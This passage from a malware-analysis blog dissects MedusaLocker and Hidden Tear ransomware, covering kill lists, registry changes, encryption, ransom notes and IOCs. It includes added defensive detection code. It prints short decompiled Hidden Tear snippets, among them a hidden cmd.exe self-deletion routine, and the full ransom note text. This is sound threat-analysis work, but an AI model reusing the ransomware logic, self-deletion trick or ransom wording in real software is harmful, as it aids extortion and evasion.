<span class="n">vmware</span><span class="o">-</span><span class="n">usbarbitator64</span><span class="p">,</span> <span class="n">vmware</span><span class="o">-</span><span class="n">converter</span><span class="p">,</span> <span class="n">dbsrv12</span><span class="p">,</span> <span class="n">dbeng8wxServer</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">wxServerView</span><span class="p">,</span> <span class="n">sqlservr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">sqlmangr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span>
<span class="n">RAgui</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">supervise</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">Culture</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">RTVscan</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">Defwatch</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">sqlbrowser</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">winword</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBW32</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBDBMgr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span>
<span class="n">qbupdate</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBCFMonitorService</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">axlbridge</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBIDPService</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">httpd</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">fdlauncher</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">MsDtSrvr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span>
<span class="n">tomcat6</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">java</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="mi">360</span><span class="n">se</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="mi">360</span><span class="n">doctor</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">wdswfsafe</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">fdlauncher</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">fdhost</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">GDscan</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">ZhuDongFangYu</span><span class="p">.</span><span class="n">exe</span>
</pre></div>
<p></br></p>
<p>It also copies itself to %APPDATA% after renaming the executable to "svchostt.exe".</p>
<p><center><img alt="Copy of the executable in Appdata" src="https://dissectingmalwa.re/img/medusa-appdata.png"></center></p>
<p></br></p>
<p>To check if an instance of MedusaLocker previously ran on the system it will create a Registry Key at <code>HKEY_CURRENT_USER\Software\Medusa</code></p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-medrec.png"></center></p>
<p></br></p>
<p>Furthermore it tries to read the state of EnableLinkedConnections via <strong>RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ...</strong> and enables the setting if necessary, since Medusa tries to encrypt shared network drives and removable media as well.</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-reg1.png"></center></p>
<p></br></p>
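<p>The host artifacts described in the last few paragraphs (the kill list, the svchostt.exe copy in %APPDATA%, the <code>HKCU\Software\Medusa</code> marker key and the EnableLinkedConnections change) are all things an endpoint sensor can see. As an added example, not code from the post, here is a small detector run over constructed Sysmon-style events in a simplified JSON schema; the field names follow Sysmon (Image, TargetFilename, TargetObject, Details, with HKCU written as HKU\SID), the event IDs use Sysmon numbering, and the timestamps, SID and paths are made up.</p>

```python
import json
from collections import deque

# Subset of the kill list printed above, normalised to lower case without ".exe".
KILL_LIST = {"sqlservr", "sqlwriter", "sqlbrowser", "msmdsrv", "httpd", "tomcat6",
             "rtvscan", "ccevtmgr", "defwatch", "qbidpservice", "java"}

# Constructed Sysmon-like events, one JSON object per line. t = seconds since trace start.
# EventID: 1 process create, 5 process terminate, 11 file create,
#          12 registry key create, 13 registry value set.
DROPPER = "C:\\Users\\victim\\Desktop\\dix_16.exe"
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"t": 0, "EventID": 1, "Image": DROPPER},
    {"t": 2, "EventID": 11, "Image": DROPPER,
     "TargetFilename": "C:\\Users\\victim\\AppData\\Roaming\\svchostt.exe"},
    {"t": 3, "EventID": 12, "Image": DROPPER,
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Medusa"},
    {"t": 4, "EventID": 13, "Image": DROPPER,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections",
     "Details": "DWORD (0x00000001)"},
    {"t": 5, "EventID": 5, "Image": "C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\sqlservr.exe"},
    {"t": 5, "EventID": 5, "Image": "C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\sqlwriter.exe"},
    {"t": 6, "EventID": 5, "Image": "C:\\Apache24\\bin\\httpd.exe"},
    {"t": 900, "EventID": 5, "Image": "C:\\Program Files\\Java\\bin\\java.exe"},   # isolated exit: benign
    {"t": 901, "EventID": 11, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\victim\\Documents\\notes.txt"},
])


def image_basename(path: str) -> str:
    """'C:\\x\\SQLSERVR.EXE' -> 'sqlservr', matching the normalised kill list."""
    name = path.rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def detect(log_text: str, window: int = 10, min_kills: int = 3) -> list:
    """Return (rule, t) tuples. Single artifacts fire on their own; process exits only
    fire when at least `min_kills` kill-list processes die within `window` seconds."""
    findings = []
    recent_kills = deque()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        eid = ev["EventID"]
        target = ev.get("TargetObject", "").lower()
        if eid == 11 and ev.get("TargetFilename", "").lower().endswith("\\appdata\\roaming\\svchostt.exe"):
            findings.append(("medusa_appdata_copy", ev["t"]))
        elif eid in (12, 13) and target.endswith("\\software\\medusa"):
            findings.append(("medusa_marker_key", ev["t"]))
        elif eid == 13 and target.endswith("\\policies\\system\\enablelinkedconnections") \
                and ev.get("Details", "").endswith("(0x00000001)"):
            findings.append(("enable_linked_connections_set", ev["t"]))
        elif eid == 5 and image_basename(ev["Image"]) in KILL_LIST:
            recent_kills.append(ev["t"])
            while recent_kills and ev["t"] - recent_kills[0] > window:
                recent_kills.popleft()
            if len(recent_kills) == min_kills:      # fire once when the burst reaches the threshold
                findings.append(("kill_list_burst", ev["t"]))
    return findings


if __name__ == "__main__":
    for rule, t in detect(SAMPLE_EVENTS):
        print("t=%4d  %s" % (t, rule))
```

<p>The burst rule is what keeps the kill list usable: a single SQL or Java process exiting is everyday noise, several of them dying within seconds of each other is not, and that pattern survives a renamed sample while the file and registry names do not.</p>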
<p>After terminating the encryption loop the Ransomware will wait for 60 seconds and start a new scan to check for new unencrypted files.</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-sleep.png"></center></p>
<p></br></p>
<p>Running MedusaLocker in a VM yields this UAC prompt with a mysterious CLSID (<em>{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</em>). A quick Google search brings us to the Wikileaks page for the <a href="https://wikileaks.org/ciav7p1/cms/page_13762807.html">CIA Vault7 leaks</a>, and the ID seems to correspond to <em>cmstplua.dll</em>. Turns out this is a UAC bypass known and implemented since August 2017 (mentioned <a href="https://twitter.com/hfiref0x/status/897662607544508417">here</a>).</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-uac0.png"></center></p>
<p></br></p>
<p>The Ransomnote (which is dropped in every directory that contains files to encrypt) is delivered as a HTML file. In this early sample they seem to have messed up their text alignment. This was fixed in a later version (see below) and will make it easier to identify new samples as they may appear. </p>
<p><center><img alt="Original Ransomnote" src="https://dissectingmalwa.re/img/medusa-note0.png"></center></p>
<p></br></p>
<p>Looking at the section list compared to the </p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-entropy2.png"></center></p>
<p></br></p>
<p>This sample seems to have an enabled debug console which allows us to trace the steps of the infection.</p>
<p><center><img alt="Debug Console" src="https://dissectingmalwa.re/img/medusa-console.png"></center></p>
<p></br></p>
<p>Below you can see the new ransomnote. The Protonmail E-Mail address was exchanged for a cock.li one and the Victim ID blob was fitted to the textbox.</p>
<p><center><img alt="Ransomnote" src="https://dissectingmalwa.re/img/medusa-note.png"></center></p>
<p></br></p>
<p>BleepingComputer Forum User ttrifonov who was hit by the ransomware as well found suspicious files on his Desktop after the Infection took place. Fortunately for us Medusa skipped the executables.</p>
<p><center><img alt="Comment on BleepingCmputer" src="https://dissectingmalwa.re/img/medusa-bleep.png"></center></p>
<p></br></p>
<p>This would be a huge discovery infection vector-wise, as it looks like the attacker gained access to the machine via RDP. (Yet another proof [if we needed any] that RDP exposed to the internet isn't a good idea.)</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-desktop.png"></center></p>
<p></br></p>
<p>Looks like the attacker left a few files related to Mimikatz as well...</p>
<p><center><img alt="Key Generation" src="https://dissectingmalwa.re/img/medusa-kami.png"></center></p>
<p></br></p>
<p>As I mentioned earlier the keypair is generated via CryptGenKey. I'm still trying to map out all the actions on the key material.</p>
<p><center><img alt="Key Generation" src="https://dissectingmalwa.re/img/medusa-genKey.png"></center></p>
<p></br></p>
<p>The encryption itself is done via the <a href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptencrypt">CryptEncrypt</a> function. It seems to use AES for the files and then encrypts the AES key with an RSA-2048 public key that is stored as a key blob in the executable.</p>
<p></br></p>
<p><center><img alt="Encryption Routine" src="https://dissectingmalwa.re/img/medusa-rsa.png"></center></p>
<p></br></p>
<p><center><img alt="Encryption Routine" src="https://dissectingmalwa.re/img/medusa-cryptenc.png"></center></p>
<p></br></p>
<p>After the encryption routine is done the generated hKey is deleted via <a href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdestroykey">CryptDestroyKey</a>.</p>
<p><center><img alt="Key Deletion" src="https://dissectingmalwa.re/img/medusa-destroyKey.png"></center></p>
<p></br></p>
<h2><strong>Update 23.11.2019:</strong></h2>
<p>Now I want to take a closer look at the files left by the attacker on the Victim's Desktop as it was reported multiple times on the BleepingComputer Forum. Besides the Mimikatz files in the kamikadze directory there is a semi-legit tool called "<strong>Advanced Port Scanner</strong>" (<a href="https://app.any.run/tasks/727e8b8d-48ee-40cb-9c19-171ed5c32431">AnyRun</a>, which is basically just a garbage Zenmap alternative for Windows people) and another one called "<strong>NetworkShare.exe</strong>" (<a href="https://app.any.run/tasks/bfa0580d-7e16-4ea0-ab44-685f62ab9bd5">AnyRun</a>, seems to scan for reachable network shares and tries to mount them).</p>
<p><center><img alt="Networkshare Discovery Tool" src="https://dissectingmalwa.re/img/medusa-networkshare.png"></center></p>
<p></br></p>
<p>It also looks like there's a dedicated version of MedusaLocker for Windows XP called <em>dix_16_xp.exe</em>. As you can see below, the Debug Messages start with <strong>[LockerXP]</strong> instead of <strong>[Locker]</strong>.</p>
<p><center><img alt="The XP Version of MedusaLocker" src="https://dissectingmalwa.re/img/medusa-lockerxp.png"></center></p>
<p></br></p>
<h3><strong>The Decryptor</strong></h3>
<p>The Decryptor is delivered per machine, with a four-letter filename indicating which victim ID it belongs to.</p>
<p><center><img alt="SSDEEP Hashes of the decryptor samples" src="https://dissectingmalwa.re/img/medusa-decList.png"></center></p>
<p></br></p>
<p><center><img alt="CLI of the Decryptor" src="https://dissectingmalwa.re/img/medusa-decryptor.png"></center></p>
<p></br></p>
<p><center><img alt="Imports listed in PEBear" src="https://dissectingmalwa.re/img/medusa-decImports.png"></center></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Associated Files</h3>
<div class="highlight"><pre>svchostt.exe
HOW_TO_OPEN_FILES.html
Advanced Port Scanner 2.4.2750.exe
d_upd1008.exe
NetworkShare_pre2.exe
PsExec64.exe (legitimate)
PsExec.exe (legitimate)
b.bat
NetworkShare.exe
kamikadze/32.exe
kamikadze/64.exe
kamikadze/64_log.txt
kamikadze/dump.bat
kamikadze/mimidrv (2).sys
kamikadze/mimilib (2).dll
kamikadze/86_log.txt
kamikadze/mimidrv.sys
kamikadze/mimilib.dll
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre>HKCU\SOFTWARE\Medusa
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ --> EnableLinkedConnections = 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System --> ConsentPromptBehaviorAdmin = 5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System --> EnableLUA = 1
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre>All your data are encrypted!
What happened?
Your files are encrypted, and currently unavailable.
You can check it: all files on you computer has new expansion.
By the way, everything is possible to recover (restore), but you need to buy a unique decryptor.
Otherwise, you never cant return your data.
For purchasing a decryptor contact us by email:
mrromber@cock.li
If you will get no answer within 24 hours contact us by our alternate emails:
mrromber@tutanota.com
What guarantees?
Its just a business. If we do not do our work and liabilities - nobody will not cooperate with us.
To verify the possibility of the recovery of your files we can decrypted 1 file for free.
Attach 1 file to the letter (no more than 10Mb). Indicate your personal ID on the letter:
Attention!
- Attempts of change files by yourself will result in a loose of data.
- Our e-mail can be blocked over time. Write now, loss of contact with us will result in a loose of data.
- Use any third party software for restoring your data or antivirus solutions will result in a loose of data.
- Decryptors of other users are unique and will not fit your files and use of those will result in a loose of data.
- If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key.
</pre></div>
<p></br></p>
<p>Medusa Icon made by Freepik from www.flaticon.com</p>
<h1>Earn-quick-BTC-with-Hiddentear.mp4 / About Open Source Ransomware</h1>
<p>Published 2019-10-26 by f0wL (tag:dissectingmalwa.re,2019-10-26:/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html)</p>
<p>No, this will not be a skiddy Tutorial on how to earn quick crypto but rather an analysis of the Open Source Ransomware "Hiddentear".</p><p><center><img alt="Hiddentear Hoodie" src="https://dissectingmalwa.re/img/hiddentear-cleansc.png"></center></p>
<p></br></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>"Shade Ransomware creater is stupid fxxxxx.exe" @ <a href="https://app.any.run/tasks/cea41d5c-84c5-43a7-93a3-b3881221d80d/">Any.Run</a>
--> <code>sha256 ba978eee90be06b1ce303bbee33c680c2779fbbc5b90c83f0674d6989564a70a</code></p>
<p></br></p>
<p><center><div class="github-card" data-github="goliate/hidden-tear" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p></br></p>
<p>Because HiddenCrypt is written in C# utilizing the .NET Framework 4, static analysis of the Binary will happen in <a href="https://www.telerik.com/products/decompiler.aspx">Progress Telerik JustDecompile</a> and <a href="https://github.com/0xd4d/dnSpy">dnSpy</a>. With over 370 Forks and about as many stars on GitHub at the time of writing this, Hiddentear is arguably the most popular open source Windows Ransomware on the platform.</p>
<p></br></p>
<p><center><img alt="Hiddentear Github" src="https://dissectingmalwa.re/img/hiddentear-git.png"></center></p>
<p></br></p>
<p>The original Ransomnote that is dropped to the Desktop by Hiddentear:</p>
<p><center><img alt="Hiddentear original Ransomnote" src="https://dissectingmalwa.re/img/hiddentear-msg.png"></center></p>
<p></br></p>
<p>It uses the RijndaelManaged class implemented in <em>System.Security.Cryptography</em> for the file encryption routine (which is just a fancy way of saying that victim data is encrypted with AES-256-CBC :D).</p>
<p><center><img alt="Hiddentear AES Routine" src="https://dissectingmalwa.re/img/hiddentear-rijndael.png"></center></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/hiddentear-plaindie.png"></center></p>
<p></br></p>
<p>By default Hidden Tear will only spare Folders whose path contains <em>Windows</em>, <em>Program Files</em> or <em>Program Files (x86)</em> (a plain substring check on the path, not an exact match of the folder name) and encrypt the contents of every Directory that doesn't match this condition.</p>
<div class="highlight"><pre>if (!directories[j].Contains("Windows") && !directories[j].Contains("Program Files") && !directories[j].Contains("Program Files (x86)"))
{
    this.encryptDirectory(directories[j], password);
    this.messageCreator(directories[j]);
}
</pre></div>
<p></br></p>
<p>Another common mechanism to disrupt detection and analysis is a self-deletion routine. After a two-second timeout to ensure execution has completed, it simply removes its own executable via cmd.exe's <em>Del</em> command.</p>
<div class="highlight"><pre>public void selfDestroy()
{
    ProcessStartInfo processStartInfo = new ProcessStartInfo()
    {
        Arguments = string.Concat("/C timeout 2 && Del /Q /F ", Application.ExecutablePath),
        WindowStyle = ProcessWindowStyle.Hidden,
        CreateNoWindow = true,
        FileName = "cmd.exe"
    };
    Process.Start(processStartInfo);
}
</pre></div>
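<p>The self-deletion routine leaves a very specific trace in process-creation telemetry: a hidden cmd.exe whose command line runs <code>timeout N &amp;&amp; Del /Q /F</code> against the image path of its own parent. The following detection logic is my own added example (not code from the original post or from Hidden Tear) and runs over constructed sample events; the event dictionary shape (<code>parent_image</code>, <code>image</code>, <code>cmdline</code>) is an assumption, adapt it to whatever your EDR or Sysmon pipeline emits.</p>

```python
"""Flag cmd.exe invocations whose delayed 'Del' target is the parent's own executable."""
import re

# Matches the "timeout N && Del /Q /F <path>" tail that Hidden Tear builds; switch order and case may vary.
SELF_DELETE_RE = re.compile(
    r"timeout\s+\d+\s*&&\s*del\s+(?:/[qf]\s+)*(?P<target>\"[^\"]+\"|\S+)",
    re.IGNORECASE,
)


def self_delete_target(cmdline):
    """Return the path a delayed Del command would remove, or None if the pattern is absent."""
    m = SELF_DELETE_RE.search(cmdline)
    return m.group("target").strip('"') if m else None


def is_self_deletion(event):
    """True when the deletion target is the image of the process that spawned cmd.exe."""
    target = self_delete_target(event["cmdline"])
    return target is not None and target.lower() == event["parent_image"].lower()


def triage(events):
    """Return the parent images of all events that look like a self-deletion routine."""
    return [e["parent_image"] for e in events if is_self_deletion(e)]


# Constructed process-creation events (not real telemetry): parent image, child image, command line.
SAMPLE_EVENTS = [
    {   # the Hidden Tear pattern: cmd.exe deleting its own parent after a 2 s timeout
        "parent_image": r"C:\Users\victim\Downloads\454364vodafone-e-fatura.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'"cmd.exe" /C timeout 2 && Del /Q /F C:\Users\victim\Downloads\454364vodafone-e-fatura.exe',
    },
    {   # ordinary cmd.exe usage, must not fire
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"cmd.exe /C dir C:\Temp",
    },
    {   # delayed deletion of some other file: same shape, but not self-deletion
        "parent_image": r"C:\Program Files\Installer\setup.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"cmd.exe /C timeout 5 && del /q /f C:\Temp\setup_tmp.log",
    },
]

if __name__ == "__main__":
    for parent in triage(SAMPLE_EVENTS):
        print("self-deletion suspected:", parent)
```

Because the binary is gone two seconds after it finishes, the command line in the process-creation event is often the only place the original path survives, which is why the rule keys on the parent image rather than on the file itself.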
<p></br></p>
<p>4shadow variant available @ <a href="https://app.any.run/tasks/82693192-3d98-41d8-bc0c-18e1fa214683/">Any.Run</a> --> <code>sha256 fd5de1631c95041fde92042dd760e1fe27c7fe217d30e6568cc2e69eb812fb85</code></p>
<p>This sample was found on the IIS Webhost of the Mineral Resources Authority of Papua New Guinea and tries to disguise itself as a Vodafone PDF Invoice.</p>
<p></br></p>
<p><center><img alt="Hiddentear UPX" src="https://dissectingmalwa.re/img/hiddentear-newguinea.png"></center></p>
<p></br></p>
<p>Throwing the dropped binary into Detect It Easy returns the notice that it pretends to be a WinRAR installer, Version 5.x.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/hiddentear-sample.png"></center></p>
<p>Extracting the strings out of the mentioned executable (with a relatively new fancy tool by FireEye called <a href="https://github.com/fireeye/stringsifter">stringsifter</a>) one can see that it actually includes three references related to WinRAR, the first being <code>D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb</code>. As for a TIL: sfx stands for "self-extracting archive", an archive packaged together with an executable stub that extracts it, so it is (more or less) independent from the host system. <a href="https://en.wikipedia.org/wiki/Self-extracting_archive">Wikipedia</a>'s got you hooked up.</p>
<p>The full string dump can be had <a href="https://dissectingmalwa.re/stuff/hiddentear-strings.txt">here</a>. It also contains a number of messages in a foreign language which Google Translate identifies as Turkish:</p>
<p></br></p>
<p><center><img alt="Strings found in the binary" src="https://dissectingmalwa.re/img/hiddentear-turkish.png"></center></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/hiddentear-unpack1.png"></center></p>
<p></br></p>
<p>Loading the binary into JustDecompile we notice that it was crypted by something called Aika.</p>
<p><center><img alt="Encryption routine" src="https://dissectingmalwa.re/img/hiddentear-netcrypt.png"></center></p>
<p></br></p>
<p>The Assembly Information also gives away that ConfuserEx is involved as well. The payload section confirms that hint: we have an encrypted payload that is fetched at runtime and then executed via RunPE.</p>
<p><center><img alt="Evidence of ConfuserEx" src="https://dissectingmalwa.re/img/hiddentear-confuserEX.png"></center></p>
<p></br></p>
<p><center><div class="github-card" data-github="1M50RRY/aika-crypter" data-width="400" data-height="150" data-theme="default"></div></center></p>
<p></br></p>
<p>Below you can see a screenshot of the Aika Crypter. As I already mentioned, it is based on ConfuserEx and includes the other run-of-the-mill evasion techniques and injections (RunPE or self).</p>
<p><center><img alt="Aika Crypter" src="https://dissectingmalwa.re/img/hiddentear-aika.png"></center></p>
<p></br></p>
<p>This sample also features an anti-debugging check via IsDebuggerPresent. Nothing we haven't seen before either.</p>
<p></br></p>
<p><center><img alt="Debugger 1" src="https://dissectingmalwa.re/img/hiddentear-isdbg.png"></center></p>
<p></br></p>
<p><center><img alt="Debugger Trap" src="https://dissectingmalwa.re/img/hiddentear-dbg.png"></center></p>
<p></br></p>
<h2><em>Open Source Ransomware (Malware)?</em></h2>
<p>The main reason why projects like Hidden Tear exist is to use them as a training model and PoC to handle "real" ransomware more efficiently. Critics say that OSS Malware will never match real threats (which is definitely true to some extent) and that it only promotes building weaponized versions of it. On the other hand OSS ransomware is very useful to get a true baseline reading from a sandbox system, since you know for sure what it will do next. So what should you think about it now? If you ask me the bad outweighs the good here: every day multiple new weaponized versions of Hidden Tear hit AnyRun, VT and Co. that are packed/obfuscated or modified with numerous evasion techniques. If it shows us one thing it's that building ransomware isn't hard. Even worse: it is not like ransomware is a dual-use tool (like e.g. a hammer). Nobody will call you out for building a PoC binary to better understand the inner workings and how to analyse it afterwards. Don't get me wrong: I'm a HUGE advocate of open source software, but please don't push your "Proof of Concepts" to GitHub if they can literally be turned into malware by exchanging a URL and a Bitcoin address.</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Hidden Tear (SHA256 / SSDEEP)</h3>
<div class="highlight"><pre>454364vodafone-e-fatura.exe
fd5de1631c95041fde92042dd760e1fe27c7fe217d30e6568cc2e69eb812fb85
24576:8NA3R5drXfZAeMQ7MSTlRVHJ88iV4npWuSp008q75pVQNohig1w2YHgLo/:95BAvu7TD1YV0xJYtYOhHdYHr/
</pre></div>
<div class="highlight"><pre>cryptoJoker.exe / "Shade Ransomware creater is stupid fxxxxx.exe"
ba978eee90be06b1ce303bbee33c680c2779fbbc5b90c83f0674d6989564a70a
12288:gnSKwjzsZpds2JbrpolSKwjzuZpXs2JTypo:USKwWes6lSKw88s/
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre>hxxp://fairybreathes.6te[.]net/write.php?info=
</pre></div>
<h3>Affected File Extensions</h3>
<div class="highlight"><pre><span></span><span class="ss">".txt"</span><span class="p">,</span> <span class="ss">".doc"</span><span class="p">,</span> <span class="ss">".docx"</span><span class="p">,</span> <span class="ss">".xls"</span><span class="p">,</span> <span class="ss">".xlsx"</span><span class="p">,</span> <span class="ss">".ppt"</span><span class="p">,</span> <span class="ss">".pptx"</span><span class="p">,</span> <span class="ss">".odt"</span><span class="p">,</span> <span class="ss">"jpeg"</span><span class="p">,</span> <span class="ss">".png"</span><span class="p">,</span> <span class="ss">".csv"</span><span class="p">,</span> <span class="ss">".sql"</span><span class="p">,</span> <span class="ss">".mdb"</span><span class="p">,</span> <span class="ss">".sln"</span><span class="p">,</span> <span class="ss">".php"</span><span class="p">,</span> <span class="ss">".asp"</span><span class="p">,</span> <span class="ss">".aspx"</span><span class="p">,</span> <span class="ss">".html"</span><span class="p">,</span> <span class="ss">".xml"</span><span class="p">,</span> <span class="ss">".psd"</span><span class="p">,</span> <span class="ss">".sql"</span><span class="p">,</span> <span class="ss">".mp4"</span><span class="p">,</span> <span class="ss">".7z"</span><span class="p">,</span> <span class="ss">".rar"</span><span class="p">,</span> <span class="ss">".m4a"</span><span class="p">,</span> <span class="ss">".wma"</span><span class="p">,</span> <span class="ss">".avi"</span><span class="p">,</span> <span class="ss">".wmv"</span><span class="p">,</span> <span class="ss">".csv"</span><span class="p">,</span> <span class="ss">".d3dbsp"</span><span class="p">,</span> <span class="ss">".zip"</span><span class="p">,</span> <span class="ss">".sie"</span><span class="p">,</span> <span class="ss">".sum"</span><span class="p">,</span> <span class="ss">".ibank"</span><span class="p">,</span> <span class="ss">".t13"</span><span class="p">,</span> <span 
class="ss">".t12"</span><span class="p">,</span> <span class="ss">".qdf"</span><span class="p">,</span> <span class="ss">".gdb"</span><span class="p">,</span> <span class="ss">".tax"</span><span class="p">,</span> <span class="ss">".pkpass"</span><span class="p">,</span> <span class="ss">".bc6"</span><span class="p">,</span> <span class="ss">".bc7"</span><span class="p">,</span> <span class="ss">".bkp"</span><span class="p">,</span> <span class="ss">".qic"</span><span class="p">,</span> <span class="ss">".bkf"</span><span class="p">,</span> <span class="ss">".sidn"</span><span class="p">,</span> <span class="ss">".sidd"</span><span class="p">,</span> <span class="ss">".mddata"</span><span class="p">,</span> <span class="ss">".itl"</span><span class="p">,</span> <span class="ss">".itdb"</span><span class="p">,</span> <span class="ss">".icxs"</span><span class="p">,</span> <span class="ss">".hvpl"</span><span class="p">,</span> <span class="ss">".hplg"</span><span class="p">,</span> <span class="ss">".hkdb"</span><span class="p">,</span> <span class="ss">".mdbackup"</span><span class="p">,</span> <span class="ss">".syncdb"</span><span class="p">,</span> <span class="ss">".gho"</span><span class="p">,</span> <span class="ss">".cas"</span><span class="p">,</span> <span class="ss">".svg"</span><span class="p">,</span> <span class="ss">".map"</span><span class="p">,</span> <span class="ss">".wmo"</span><span class="p">,</span> <span class="ss">".itm"</span><span class="p">,</span> <span class="ss">".sb"</span><span class="p">,</span> <span class="ss">".fos"</span><span class="p">,</span> <span class="ss">".mov"</span><span class="p">,</span> <span class="ss">".vdf"</span><span class="p">,</span> <span class="ss">".ztmp"</span><span class="p">,</span> <span class="ss">".sis"</span><span class="p">,</span> <span class="ss">".sid"</span><span class="p">,</span> <span class="ss">".ncf"</span><span class="p">,</span> <span class="ss">".menu"</span><span class="p">,</span> 
<span class="ss">".layout"</span><span class="p">,</span> <span class="ss">".dmp"</span><span class="p">,</span> <span class="ss">".blob"</span><span class="p">,</span> <span class="ss">".esm"</span><span class="p">,</span> <span class="ss">".vcf"</span><span class="p">,</span> <span class="ss">".vtf"</span><span class="p">,</span> <span class="ss">".dazip"</span><span class="p">,</span> <span class="ss">".fpk"</span><span class="p">,</span> <span class="ss">".mlx"</span><span class="p">,</span> <span class="ss">".kf"</span><span class="p">,</span> <span class="ss">".iwd"</span><span class="p">,</span> <span class="ss">".vpk"</span><span class="p">,</span> <span class="ss">".tor"</span><span class="p">,</span> <span class="ss">".psk"</span><span class="p">,</span> <span class="ss">".rim"</span><span class="p">,</span> <span class="ss">".w3x"</span><span class="p">,</span> <span class="ss">".fsh"</span><span class="p">,</span> <span class="ss">".ntl"</span><span class="p">,</span> <span class="ss">".arch00"</span><span class="p">,</span> <span class="ss">".lvl"</span><span class="p">,</span> <span class="ss">".snx"</span><span class="p">,</span> <span class="ss">".cfr"</span><span class="p">,</span> <span class="ss">".ff"</span><span class="p">,</span> <span class="ss">".vpp_pc"</span><span class="p">,</span> <span class="ss">".lrf"</span><span class="p">,</span> <span class="ss">".m2"</span><span class="p">,</span> <span class="ss">".mcmeta"</span><span class="p">,</span> <span class="ss">".vfs0"</span><span class="p">,</span> <span class="ss">".mpqge"</span><span class="p">,</span> <span class="ss">".kdb"</span><span class="p">,</span> <span class="ss">".db0"</span><span class="p">,</span> <span class="ss">".dba"</span><span class="p">,</span> <span class="ss">".rofl"</span><span class="p">,</span> <span class="ss">".hkx"</span><span class="p">,</span> <span class="ss">".bar"</span><span class="p">,</span> <span class="ss">".upk"</span><span class="p">,</span> 
